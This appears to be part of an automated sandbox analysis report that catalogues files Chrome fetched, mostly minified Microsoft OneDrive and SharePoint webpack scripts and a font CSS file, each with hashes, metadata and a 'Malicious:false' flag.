                              Preview:(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[35],{386:function(e,t,n){var a;!function(i,r){"use strict";var o=function(e){if("object"!=typeof e.document)throw new Error("Cookies.js requires a `window` with a `document` object");var t=function(e,n,a){return 1===arguments.length?t.get(e):t.set(e,n,a)};return t._document=e.document,t._cacheKeyPrefix="cookey.",t._maxExpireDate=new Date("Fri, 31 Dec 9999 23:59:59 UTC"),t.defaults={path:"/",secure:!1},t.get=function(e){return t._cachedDocumentCookie!==t._document.cookie&&t._renewCache(),t._cache[t._cacheKeyPrefix+e]},t.set=function(e,n,a){return(a=t._getExtendedOptions(a)).expires=t._getExpiresDate(n===r?-1:a.expires),t._document.cookie=t._generateCookieString(e,n,a),t},t.expire=function(e,n){return t.set(e,r,n)},t._getExtendedOptions=function(e){return{path:e&&e.path||t.defaults.path,domain:e&&e.domain||t.defaults.domain,expires:e&&e.expires||t.defaults.expires,secure:e&&e.secure!==r?e.secure:t.defaults.secure}},t._isVal
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (13521)
                              Category:downloaded
                              Size (bytes):13957
                              Entropy (8bit):5.28057242560418
                              Encrypted:false
                              SSDEEP:
                              MD5:CABAF43CCA09CFECF777C2C7473036BE
                              SHA1:B23C14BE837F806CB9B2BC2C10BE365957148E36
                              SHA-256:CE2F6F82AFE75F5CF481D04C0DF79BDD1438E4C2FB1D41FCCD6B40E2F4122F94
                              SHA-512:678E31260790B6F7304EBC813F26D1DFE8FD77A1D9D1C44F68DFDAC5E3893B33615B00CE261320BAE216CB441CDCB290E8F9A4B9B08A2C73BCC8A5502EA7358B
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/freemiumlistshomewebpack/0.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[0],{314:(e,t,n)=>{n.d(t,{a:()=>a.b});var a=n(57)}.,279:(e,t,n)=>{n.d(t,{a:()=>a.a});var a=n(280)}.,213:(e,t,n)=>{n.r(t),n.d(t,{default:()=>T,resourceKey:()=>U});var a=n("tslib_102"),i=n(212),r=n(314),o=n(127),s=n(132);function c(e){for(var t={},n=0,a=e.results;n<a.length;n++){var i=a[n],r=i.Key,o=i.Value;switch(i.ValueType){case"Edm.Boolean":t[r]={false:!1,true:!0}[o];break;case"Edm.Double":t[r]=parseFloat(o);break;case"Edm.Byte":case"Edm.Int32":case"Edm.Int64":t[r]=parseInt(o,10);break;case"Null":t[r]=null;break;case"Edm.String":if("Edges"===r){for(var s=JSON.parse(o),c=0,d=s;c<d.length;c++){var l=d[c];l.Properties.BlobContent&&(l.Properties.BlobContent=JSON.parse(l.Properties.BlobContent.toString()))}t[r]=s}else t[r]=o;break;default:t[r]=o}}return t}function d(e){return{views:e.ViewsLifeTime||0,viewsUnique:e.ViewsLifeTimeUniqueUsers||0,viewsLast2Weeks:e.ViewsRecent||0,viewsLast2WeeksUnique:e.ViewsRecentUniq
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (1312)
                              Category:downloaded
                              Size (bytes):1317
                              Entropy (8bit):5.284999482045033
                              Encrypted:false
                              SSDEEP:
                              MD5:02D00B8998FF8637A4A1EDF95D8A6CC6
                              SHA1:C520AAF393793588A4479DB017C497EF3DFF70AA
                              SHA-256:119DD364FB33BAD43ABE8F1799E77E95A8D0960A23C9A1E9FB753BF0A710FD0A
                              SHA-512:B6611400BBABD3129BBBED205A001FE12A4B9C3DFF8DF924CBD9226BE3E32645EC90A67F3250162A965AA9443A5A7440D4985849D543C1042C3A82D1F9056964
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/odblightspeedwebpack/569.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[569],{4962:function(e,t,n){n.r(t),n.d(t,{LaunchMoveCopyPickerHandler:function(){return l}});var a=n("tslib_102"),i=n(2088),r=n("odsp.util_578"),o=n(47),s=n(2211),c=n(2100),d=r.HW.isActivated("27f9c6a6-8575-4c8f-a864-61fb7dbcd5f4","09/05/2023","check for permission for copy to command in one up"),l=function(e){function t(t){var n=e.call(this,t)||this;if(n._isMove=!!t.isMove,n._itemSelectionHelper=new(n.resources.consume(c.a))({allowMultiSelect:!1,canFallback:!0}),d)n.state=n.createObservable({isAvailable:!0});else{var a=n._itemSelectionHelper.currentItem(),i=o.a.hasItemPermission(a,o.a.openItems);n.state=n.createObservable({isAvailable:i})}return n}return(0,a.XJ)(t,e),t.prototype.getParams=function(){return(0,a.Zd)(this,void 0,void 0,function(){var e;return(0,a.qr)(this,function(t){switch(t.label){case 0:return e={isMove:this._isMove},[4,this._itemSelectionHelper.resolveSelection()];case 1:return[2,(e.currentI
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (12904)
                              Category:downloaded
                              Size (bytes):14499
                              Entropy (8bit):5.322631849514191
                              Encrypted:false
                              SSDEEP:
                              MD5:36B7875B8E69FF0180707C70AADA9F1E
                              SHA1:81120051D30D96F7499E0FD3B23B4C8BACBBA5D9
                              SHA-256:116221711C175E22EDE936FB455A9A99B1E77848F8F1E7F5678DB5B363B215AD
                              SHA-512:CFB334F5259B622A7C6A8CB5C238414E59781D877ABF596040EA39058893CD344823857972E7A4EA758E9197A03A348530546585CDF81ED62DB642F6A01BD3BC
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/metaosfilebrowser/14.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[14],{502:(e,t,n)=>{n.d(t,{a:()=>r});var a=n("react-lib"),i=n(5625);function r(e){var t=a.useState(e),n=t[0],r=t[1];return[n,{setTrue:(0,i.a)(function(){return function(){r(!0)}}),setFalse:(0,i.a)(function(){return function(){r(!1)}}),toggle:(0,i.a)(function(){return function(){r(function(e){return!e})}})}]}}.,3612:(e,t,n)=>{n.d(t,{a:()=>N});var a=n(5398),i=n("tslib_102"),r=n("react-lib"),o=n(5401),s=n(5626),c=n("fui.util_150"),d=n(5619),l=n("fui.core_238"),u=n(182),f=n(5414),p=f.c.durationValue2,m={root:"ms-Modal",main:"ms-Dialog-main",scrollableContent:"ms-Modal-scrollableContent",isOpen:"is-open",layer:"ms-Modal-Layer"},_=n(459),h=n(3401),b=n(5628),g=n(5789),v=n(5790),y=n(2422),S=n(5771),D=(0,c.e1)(function(e,t){return{root:(0,c.Pl)(e,t&&{touchAction:"none",selectors:{"& *":{userSelect:"none"}}})}}),I=n(5622),x=n(5624),C=n(5623),O={start:"touchstart",move:"touchmove",stop:"touchend"},w={start:"mousedown",mo
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text
                              Category:downloaded
                              Size (bytes):14730
                              Entropy (8bit):4.846925666070396
                              Encrypted:false
                              SSDEEP:
                              MD5:FE46325BF6167047462E10177C5D208F
                              SHA1:B54445BCCC3F97503835D374A8BEEDE48759723D
                              SHA-256:E46A8F98BDF831BBDCA0057CD9F046E6454C85478BDE2202A8FAEE6BDBF7B683
                              SHA-512:48ABC256D7AFE259A19624518F7C18DEF32759886CCC94FA41D02DEBD2729171ECA2B2621A4DE0B58351D19FDAD33C6D2CA2FB91EB03A1710478143AC76D3F15
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/fabric-cdn-prod_20240312.001/onedrive-assets/onedrive-font-face-definitions.css
                              Preview:./* Leelawadee UI (Thai and Lao) does not have a 'light' weight, so we the 'semilight' weight instead. */.@font-face {. font-family: 'Leelawadee UI Web';. src: url('https://static2.sharepointonline.com/files/fabric/assets/fonts/leelawadeeui-thai/leelawadeeui-semilight.woff2') format('woff2'), url('https://static2.sharepointonline.com/files/fabric/assets/fonts/leelawadeeui-thai/leelawadeeui-semilight.woff') format('woff');. font-weight: 100;. font-style: normal;.}..@font-face {. font-family: 'Leelawadee UI Web';. src: url('https://static2.sharepointonline.com/files/fabric/assets/fonts/leelawadeeui-thai/leelawadeeui-semilight.woff2') format('woff2'), url('https://static2.sharepointonline.com/files/fabric/assets/fonts/leelawadeeui-thai/leelawadeeui-semilight.woff') format('woff');. font-weight: 300;. font-style: normal;.}..@font-face {. font-family: 'Leelawadee UI Web';. src: url('https://static2.sharepointonline.com/files/fabric/assets/fonts/leelawadeeui-thai/leelawadeeui-regul
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (2361)
                              Category:downloaded
                              Size (bytes):9328
                              Entropy (8bit):5.305641381117
                              Encrypted:false
                              SSDEEP:
                              MD5:D977A411B5EEEA3085CC3A655DF4D3CA
                              SHA1:6AE125C44A0DD440E13F2C353346F748D3A64195
                              SHA-256:3E65665BEEE7C9DD2D7678C060BC00D77BAAE33EE2C02476CAC65DACFD0A9716
                              SHA-512:9CB5575122BA36299D253EC1B121D250247951C34A4D5C170C038976048733147E0E38A01F0888C6B03E979F67EA596F54F815775BF96469D7A96EE32BD1314D
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/57.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[57,81],{819:(e,t,n)=>{n.d(t,{a:()=>l});var a=n("react-dom-lib"),i=n("tslib_102"),r=n("react-lib"),o=n("fui.lcoms_307"),s=n(21),c=n("odsp.util_578");function d(){return!c.HW.isActivated("4BDEE9AA-40BA-4E0B-905B-33362718986A")&&(0,s.P)({ODB:61241})}var l,u=function(e){var t=e.children,n=r.useMemo(d,[]);return r.createElement(o._z.Provider,{value:n},t)};l=c.HW.isActivated("26DDB843-862A-4916-A636-1BCE47633238")?a.render:function(){for(var e=[],t=0;t<arguments.length;t++)e[t]=arguments[t];var n=e[0],a=e.slice(1);return o.bCK.apply(void 0,(0,i.AE)([r.createElement(u,null,n)],a,!1))}}.,626:(e,t,n)=>{n.r(t),n.d(t,{ReactBridge:()=>S,asPreact:()=>D});var a=n("react-lib"),i=n(1),r=n(0),o=n(121),s=n(157),c=n("tslib_102"),d=n("react-dom-lib"),l=n("fui.util_150"),u=n(557),f=0,p=(0,l.bQ)(function(e){return"".concat(++f)}),m=n(819),_=(0,i.c)({render:function(e,t){(0,m.a)(e,t)},unmount:d.unmountComponentAtNode}),h="AsReactCh
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (7586)
                              Category:downloaded
                              Size (bytes):25959
                              Entropy (8bit):5.452657141835949
                              Encrypted:false
                              SSDEEP:
                              MD5:0BA5347473E163CBB8DA8412832E9C5F
                              SHA1:0EAE13B08FCF5E4A3E1F623436F1CE59E0DD4344
                              SHA-256:9E9A2C9132FBD4BA33008FA4154E2529184D747D75F27525BDECB0F3247D03BE
                              SHA-512:76BB13D43B02B35160B7246695E3CA7B7237D6A9457419A2C199039FA2C55106395EA5B9E58ACB84693FB165FA5BF0D97D445BBFA684973A676D3DC3FC2EDEDE
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/188.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[188],{1807:(e,t,n)=>{n.d(t,{a:()=>h,b:()=>g,c:()=>m,d:()=>v});var a=n("tslib_102"),i=n(1),r=n(20),o=n(3),s=n(39),c=n(1313),d=n("fui.core_238"),l=n("fui.util_150"),u=n(1808),f=n(175),p=n(40);function m(e){var t,n=e.htmlElementId,d=e.group,l=e.rowIndex,m=e.groupNameClickActionKey,_=e.groupToggleClickActionKey,h=e.expandButtonAriaLabel,v=void 0===h?"":h,y=e.selectGroupItemsAriaLabel,S=void 0===y?"":y,D=e.groupHeaderRowAriaLabel,I=void 0===D?"":D,x=e.depth,C=e.maxDepth,O=e.fieldDetails,w=e.groupByFieldName,E=void 0===w?"":w,A=e.collapsedGroupKeysSet,L=e.groupHeaderTitleRenderer,k=(0,s.d)([{key:_}]),M=O.length,P=[c.k];P=x===C?P.concat([c.l]):P.concat([c.m]),d.isSelected&&(P=P.concat([p.G]));var T=(0,s.d)([{key:o.Y}]),U={group:d,columnCount:M,groupByFieldName:E,groupNameClickActionKey:m};return(0,i.h)("div",(0,a.W_)({key:d.key,id:n,class:P.join(" "),"aria-selected":d.isSelected,"aria-expanded":!d.isCollapsed,"aria-
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (50386)
                              Category:downloaded
                              Size (bytes):146447
                              Entropy (8bit):5.447196248293543
                              Encrypted:false
                              SSDEEP:
                              MD5:EEBFE3C50961AE0011B93D9A19B177D5
                              SHA1:AA1E142DCD2B7ED63FCB33D0FB3ADBD6C2C1CEE9
                              SHA-256:2E50AEB07EB19CCAEB240962C86FE3584131EE48C2E6E9075218C1C54B3C4067
                              SHA-512:827E88FE7FB0172913730264DFF605E9811061498EBCBB069AB35F9DD0D9911EE3C16FB4BC23F291E79E6A02EEC96718DEAF25879C424983C5311BEE20E5670B
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/41.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[41],{1604:(e,t,n)=>{n.d(t,{a:()=>c});var a=n("tslib_102"),i=n("react-lib"),r=n("fui.lco_35"),o=n("fui.lcu_548"),s=(0,n("fui.util_150").e1)(function(e,t){return(0,o.uS)({root:[(0,r.mRu)(e,{inset:1,highContrastStyle:{outlineOffset:"-4px",outline:"1px solid Window"},borderColor:"transparent"}),{height:24}]},t)}),c=function(e){function t(){return null!==e&&e.apply(this,arguments)||this}return(0,a.XJ)(t,e),t.prototype.render=function(){var e=this.props,t=e.styles,n=e.theme;return i.createElement(r.ECZ,(0,a.W_)({},this.props,{styles:s(n,t),onRenderDescription:r.KE8}))},(0,a.uh)([(0,o.LK)("MessageBarButton",["theme","styles"],!0)],t)}(i.Component)}.,1391:(e,t,n)=>{n.d(t,{a:()=>i,b:()=>a,c:()=>r,d:()=>o});var a="BgColorChoice",i="BgColorChoicePill",r="KanbanCardDesignerDocLib",o="KanbanCardDesigner100"}.,1598:(e,t,n)=>{n.d(t,{a:()=>i});var a=n(29);function i(e,t,n,i,r){return"".concat(e,"/thumbnails/0/c").concat(t,"x
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (59235)
                              Category:downloaded
                              Size (bytes):184405
                              Entropy (8bit):5.374589812389506
                              Encrypted:false
                              SSDEEP:
                              MD5:3A5A3E2C3D82D67F8B7774CE24F7CE09
                              SHA1:6013633EC9CF728F3419DAE42A9E613776F64984
                              SHA-256:EE6BC1F32DE19BD5277FA28F5F6BDDF6D65954E8D099664FB2171F3AD9448553
                              SHA-512:7223BDDC3581D7AB43D2F25FE7F2F1B792536E381B17B1CC45E03D1B557A07AD68343F0526EED19B3E71871AFCF9BCD1526B78574BD882F48A57A17167C75446
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/173.js
                              Preview:/*! For license information please see 173.js.LICENSE.txt */.(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[173],{1172:(e,t,n)=>{"use strict";var a=n(1173),i=[],r=[],o=a.makeRequestCallFromTimer(function(){if(r.length)throw r.shift()});function s(e){var t;(t=i.length?i.pop():new c).task=e,a(t)}function c(){this.task=null}e.exports=s,c.prototype.call=function(){try{this.task.call()}catch(e){s.onerror?s.onerror(e):(r.push(e),o())}finally{this.task=null,i[i.length]=this}}}.,1173:(e,t,n)=>{"use strict";function a(e){r.length||i(),r[r.length]=e}e.exports=a;var i,r=[],o=0;function s(){for(;o<r.length;){var e=o;if(o+=1,r[e].call(),o>1024){for(var t=0,n=r.length-o;t<n;t++)r[t]=r[t+o];r.length-=o,o=0}}r.length=0,o=0}var c,d,l,u=void 0!==n.g?n.g:self,f=u.MutationObserver||u.WebKitMutationObserver;function p(e){return function(){var t=setTimeout(a,0),n=setInterval(a,50);function a(){clearTimeout(t),clearInterval(n),e()}}}"function"==typeof f?(c=1,d=new f(s),l=document.createText
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (2949)
                              Category:downloaded
                              Size (bytes):2954
                              Entropy (8bit):4.371825073389862
                              Encrypted:false
                              SSDEEP:
                              MD5:AEA2D63EEC8D00BB92B3CD127D6F9AE1
                              SHA1:EA1F747A89D3602D789DC97BE587A613DA51AD23
                              SHA-256:83AC16D1B9103CFB45C7ED8C7AEC1030FC44A62652FD8D6EE62428DC2E0E9C95
                              SHA-512:BE2F584CBBF03A6228D44E708F548097DE75559240DFD34FF994A1CB0807BE659C2D8899F6BBBDE6CE82F9432198B84AEA42A348D73DC726832C355EB35AA760
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/@ms/stream-bundle/chunks/11639.js
                              Preview:"use strict";(self.webpackChunk_ms_stream_bundle=self.webpackChunk_ms_stream_bundle||[]).push([[11639],{411639:(e,t,n)=>{n.d(t,{Jjd:()=>o,Ri1:()=>i,XXG:()=>r,jKG:()=>c,wIl:()=>s});var a=n(875427);const i=(0,a.k)("Sparkle20Regular","20",["M7.4 12.8a1.04 1.04 0 0 0 1.59-.51l.45-1.37a2.34 2.34 0 0 1 1.47-1.48l1.4-.45A1.04 1.04 0 0 0 12.25 7l-1.37-.45A2.34 2.34 0 0 1 9.4 5.08L8.95 3.7a1.03 1.03 0 0 0-.82-.68 1.04 1.04 0 0 0-1.15.7l-.46 1.4a2.34 2.34 0 0 1-1.44 1.45L3.7 7a1.04 1.04 0 0 0 .02 1.97l1.37.45a2.33 2.33 0 0 1 1.48 1.48l.46 1.4c.07.2.2.37.38.5Zm.08-7.4.53-1.38.44 1.37a3.33 3.33 0 0 0 2.12 2.12l1.4.53-1.38.45a3.34 3.34 0 0 0-2.11 2.11l-.53 1.38-.45-1.38a3.34 3.34 0 0 0-2.1-2.12L4 7.96 5.4 7.5a3.36 3.36 0 0 0 2.08-2.12Zm6.06 11.45a.8.8 0 0 0 1.22-.4l.25-.76a1.09 1.09 0 0 1 .68-.68l.77-.25a.8.8 0 0 0-.02-1.52l-.77-.25a1.08 1.08 0 0 1-.68-.68l-.25-.77a.8.8 0 0 0-1.52.01l-.24.76a1.1 1.1 0 0 1-.67.68l-.77.25a.8.8 0 0 0 0 1.52l.77.25a1.09 1.09 0 0 1 .68.68l.25.77c.06.16.16.3.3.4Zm-.92-2.
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (1850)
                              Category:downloaded
                              Size (bytes):1855
                              Entropy (8bit):5.149557217629127
                              Encrypted:false
                              SSDEEP:
                              MD5:3773EC752F9F7C5B6CAD3C586620842E
                              SHA1:F3FC4DFCEBEB815CFA37A0DE82708AD4B830893C
                              SHA-256:BDDF26A7A3F6765F37C3F2A4DAA674F2860F8A1438265A5D05727C08D460A266
                              SHA-512:19F4C3197551EAACB9E24DB4658958BB35D38D9D06B6ED809E4C11646ACA65C6CB628F4DECC4C41C4DE556F36F6C49A275396C5BFFDF546A07A3B826E9665696
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/251.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[251],{1873:(e,t,n)=>{n.r(t),n.d(t,{SPComplianceDataSource:()=>u,SpComplianceDataSourceKey:()=>f});var a=n("tslib_102"),i=n("odsp.util_578"),r=n(4),o=n(476),s=n(2063),c=n(995),d=n(97),l=n(24),u=function(e){function t(t,n){var a=e.call(this,{dataSourceName:"SPComplianceDataSource"},n)||this;return a._identityDataSource=n.identityDataSource,a}return(0,a.XJ)(t,e),t.prototype.reportAbuse=function(e){var t=this,n=this.getRequestUrl(e.itemId,"reportAbuse"),a=JSON.stringify({category:e.category,description:e.description});return this._identityDataSource.getSharePointToken(this._pageContext.webAbsoluteUrl).then(function(e){(0,l.b)().Telemetry.Engagement.logData({name:"SpartanList_ReportConcern"}),t.dataRequestor.getData({url:n,method:"POST",qosName:"Compliance_reportAbuse",parseResponse:function(e,t){},additionalPostData:a,authToken:"".concat(e.accessToken),contentType:"application/json"})})},t.prototype.appeal=functi
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (37600)
                              Category:downloaded
                              Size (bytes):42474
                              Entropy (8bit):4.816616405309512
                              Encrypted:false
                              SSDEEP:
                              MD5:E36683849FD33401E061BAA38B49B558
                              SHA1:0AB4CEE4FD466154755AE2E5C9CEAE58D3005166
                              SHA-256:DF8AA1DE22E236F7F8BF6F0FB35E337FC055989E9E06089DEA08F72CE829C26B
                              SHA-512:2733D2E391138E5B2FBD84262E339AA397E3850C1FDBF0FF7C9C0F717461FF1FAF6F452DDE22E718BE0C14670C71BE3005FB99DA7CE54C4311F611F4866A4232
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/stsserviceworkerprefetch/stsserviceworkerprefetch.js
                              Preview:.if (typeof self !== 'undefined') {. const versionedPaths = ["@ms/stream-bundle/chunks/11111.js","@ms/stream-bundle/chunks/11639.js","@ms/stream-bundle/chunks/12906.js","@ms/stream-bundle/chunks/14727.js","@ms/stream-bundle/chunks/1733.js","@ms/stream-bundle/chunks/17840.js","@ms/stream-bundle/chunks/19144.js","@ms/stream-bundle/chunks/19446.js","@ms/stream-bundle/chunks/21021.js","@ms/stream-bundle/chunks/27760.js","@ms/stream-bundle/chunks/28247.js","@ms/stream-bundle/chunks/29636.js","@ms/stream-bundle/chunks/29728.js","@ms/stream-bundle/chunks/30120.js","@ms/stream-bundle/chunks/34876.js","@ms/stream-bundle/chunks/35143.js","@ms/stream-bundle/chunks/35998.js","@ms/stream-bundle/chunks/36074.js","@ms/stream-bundle/chunks/37323.js","@ms/stream-bundle/chunks/38661.js","@ms/stream-bundle/chunks/39879.js","@ms/stream-bundle/chunks/42945.js","@ms/stream-bundle/chunks/43044.js","@ms/stream-bundle/chunks/45324.js","@ms/stream-bundle/chunks/48591.js","@ms/stream-bundle/chunks/53239.js","@m
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (2653)
                              Category:downloaded
                              Size (bytes):5145
                              Entropy (8bit):5.220399152179638
                              Encrypted:false
                              SSDEEP:
                              MD5:FE3107C47150D93ADC269F4D39C2C1CB
                              SHA1:C72B16A209D1024FD514464624F8AF7040837BE0
                              SHA-256:6B1C9B6F378A52329B0D2C00D8EC9617881DC6E0C60151C5C1E84AB041860F32
                              SHA-512:472E5D2B65EAE4F4734D3570C89DE9F4913A60DCFA77F9F2FE61686F5A6B2079248499EAF1356765781BC44B75761ECF854715134A8BF63A5E921577A7DED4B6
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/94.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[94],{812:(e,t,n)=>{n.d(t,{a:()=>r});var a=n(56),i=n(115),r=(0,n("odsp.util_578").Yx)("ItemUrlHelper",i.a,{pageContext:a.a})}.,878:(e,t,n)=>{n.d(t,{a:()=>s,b:()=>d,c:()=>c});var a=n(53),i=n(289),r=n(760),o=n(761),s={idParamKey:a.b,parentIdParamKey:o.a,driveIdParamKey:"driveId",driveEndpointParamKey:"endpoint",queryTypeParamKey:"view",pageParamKey:"p",parentQueryTypeParamKey:"parentview",windowNameJsonKey:"ODBParams",queryParamKey:a.h,conversationIdParamKey:"cvid",metadataSearchIdKey:a.f,uniqueParamKey:"u",navParamKey:"nav",localeKey:"locale",dateFilterKey:"dateFilter",typeFiltersKey:a.j,userFiltersKey:"userFilters",viewIdKey:a.k,viewPathKey:a.l,isPowerAppView:"isPowerAppView",listIdKey:a.d,listUrlKey:a.e,sortFieldKey:a.i,isAscendingKey:a.c,policyTipKey:"policyTipForListItemId",sharingKey:"sharingDialogForListItemId",openShare:"openShare",managePermissionsKey:"managePermissionsForListItemId",pseudoPolicyTipKey:
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (49570)
                              Category:downloaded
                              Size (bytes):138359
                              Entropy (8bit):5.267924256122944
                              Encrypted:false
                              SSDEEP:
                              MD5:DBBA06246DAD712F3246C6A7124F8BE1
                              SHA1:3B23EC8E7E8E38F9A60680C2992934A069AD8B50
                              SHA-256:198637B7A74B61CBC63AE83069B5A512015EFAB0EEAF455C1DEAA86A6D894634
                              SHA-512:6D698246357CBF08CA619A67DF34F2C41D463649732823FCA21A3F5B54814A60AA16F61FFE40946C3F670C2A483AE340DF8DAA4842787B52623E71F796A1F3EE
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/163.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[163],{900:(e,t,n)=>{n.d(t,{a:()=>i});var a=n(842);function i(e){return(0,a.a)(e())}}.,893:(e,t,n)=>{n.d(t,{a:()=>c,b:()=>s});var a=n(830),i=n(324),r=n(829),o=new a.a("operation",{operationTypeId:i.b,keyFacetId:i.b});function s(e){var t=e.operationTypeFacet,n=e.keyFacet;return o.serialize({operationTypeId:t.id,keyFacetId:n.id})}function c(e){var t=o.deserialize(e),n=t.keyFacetId,a=t.operationTypeId;return{keyFacet:r.a.get(n),operationTypeFacet:r.a.get(a)}}}.,894:(e,t,n)=>{n.d(t,{a:()=>l,b:()=>d,c:()=>c});var a=n("tslib_102"),i=n(829),r=n(893),o=n("odsp.util_578"),s=n(895),c=new i.a("noRegisteredHandlerError");function d(e){var t=e.operationTypeFacet,n=e.keyFacet;return new s.a({message:"There is no operation handler registered for operation type '".concat(t.id,"' of key facet '").concat(n.id,"'."),isExpected:!0,facets:(0,a.W_)({},c.pack((0,r.b)({operationTypeFacet:t,keyFacet:n})))})}var l=function(e){function
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (28465)
                              Category:downloaded
                              Size (bytes):34122
                              Entropy (8bit):5.324255863741801
                              Encrypted:false
                              SSDEEP:
                              MD5:CE8F5367096AC32D47FB3D5957C886CF
                              SHA1:F50273765DC1275AFB21C6473BFAFA73E4C6CA64
                              SHA-256:69766AAF1F4C0F11564408FFBA896172D48704DF3A4DF04D804576A5955B8DBF
                              SHA-512:F1366280B46360F5C7ED37A70575BAAFAFAD85A0BB1554DD263FD2960077E180AA07B540907007873C5621C7D7D19A785EA33230DD4419E3ACA7E1DFF40771AF
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/odblightspeedwebpack/23.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[23],{6198:function(e,t,n){n.d(t,{a:function(){return F},b:function(){return H}});var a=n("tslib_102"),i=n(2608),r=n(219),o=n(402),s=n(1333),c=n(2313),d=n(3311),l=n(2670),u=n(2672),f=n(2609),p=n(2384),m=n(2553),_=n(2673),h=n(2855),b=n(2674),g=n(174),v=n(220),y=n(3050),S=n(2343),D=n(54),I=n(1477),x=n("odsp.util_578"),C=n(1467),O=n(2552),w=n(224),E=n(2671),A=!x.HW.isActivated("48d0bf6b-2e41-42a8-a3a3-e8d2ef405dbb","7/14/2022","better error handling"),L=x.HW.isActivated("3e85cd31-2807-44c1-96bf-35f08619ec11","1/31/2023","Fix for not appending navId to SPL link"),k=x.HW.isActivated("46a06a91-966f-47f1-af68-09d8b3864e12","07/03/2023","Override navId with navIdSendLinkOverride")||x.IT.isFeatureEnabled({ECS:1107386}),M=x.HW.isActivated("62a4337e-d21e-407b-b2ef-2163777d20b8","12/19/2022","Link unfurl using displayName KS")||x.IT.isFeatureEnabled({ECS:1059927}),P=x.HW.isActivated("9c1ecbd5-cae0-484e-ba86-18863f653357",
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:Java source, ASCII text
                              Category:dropped
                              Size (bytes):699
                              Entropy (8bit):5.074186536201478
                              Encrypted:false
                              SSDEEP:
                              MD5:822CB66E716AE013F5418575BD65B0F5
                              SHA1:F88B3DA1241F002CC2CF5FA37B63E9D5D1C431F0
                              SHA-256:91185CDAD5B67C61F3F3B8F7A9309AE97D412F5BD7F8C3AD7C2F37954F12B029
                              SHA-512:D978683BE34A63CBBA043541C764D06A4ED00276959828FDD4D3AE59D873CBF485DC18BA5B2907278FF50EC8D81AF5B1F83BD1C3B3718CB4C05AE8CFCDC8D9FE
                              Malicious:false
                              Reputation:unknown
